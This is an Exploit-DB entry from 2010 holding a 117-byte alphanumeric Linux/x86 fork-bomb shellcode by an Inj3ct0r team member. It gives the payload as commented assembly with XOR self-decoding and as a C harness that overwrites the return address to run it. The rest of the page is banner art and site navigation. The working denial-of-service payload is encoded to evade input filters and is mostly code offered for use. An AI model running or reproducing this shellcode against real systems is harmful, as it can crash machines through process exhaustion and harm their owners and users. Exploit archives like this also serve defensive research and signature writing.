Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)

EDB-ID:

13716

CVE:

N/A

EDB Verified:

Author:

agix

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2010-05-27

Vulnerable App: 
/*
 | Title: Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
 | Type: Shellcode
 | Author: agix
 | Platform: Linux X86
*/

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ##################################                1
0                    I'm agix member from Inj3ct0r Team                1
1                    ##################################                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


/*
dec esp
        dec esp
        dec esp
        dec esp
        push dword 0x58494741
        pop eax
        xor eax, 0x58494741
        dec eax 
        pop edx
        push esp
        pop ecx 
        push eax
        push ecx
        push edx
        push eax
        push esp
        push ebp
        push edx
        push edi
        popad
        dec ecx
        push dword 0x45525649
        dec ecx
        xor [ecx], bh
        push word 0x5445
        pop dx
        xor [ecx], dh
        dec ecx
        xor [ecx], bh
        push word 0x4255
        pop dx
        xor[ecx], dh
        dec ecx
        xor [ecx], bh
        push word 0x3636
        pop dx
        xor [ecx], dh
        dec ecx
        push dword 0x6b6e756a
        xor [ecx], bh
        push word 0x5974
        pop dx
        xor [ecx], dh
        dec ecx
        push word 0x3636
        pop dx
        xor [ecx], dh
        dec ecx
        push word 0x776F
        pop dx
        xor [ecx], dh
        push esp
        push esi
        pop ecx
        xor [ecx + 116], bh
        push word 0x7065
        pop dx
        xor [ecx + 116], dh
        dec esp
*/


#include <stdio.h>

char shellcode[] =
"LLLLhAGIXX5AGIXHZTYPQRPTURWaIhIVREI09fhETfZ01I09fhUBfZ01I09fh66fZ01Ihjunk09fhtYfZ01Ifh66fZ01IfhowfZ01TVY0ytfhepfZ0qtL";


int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services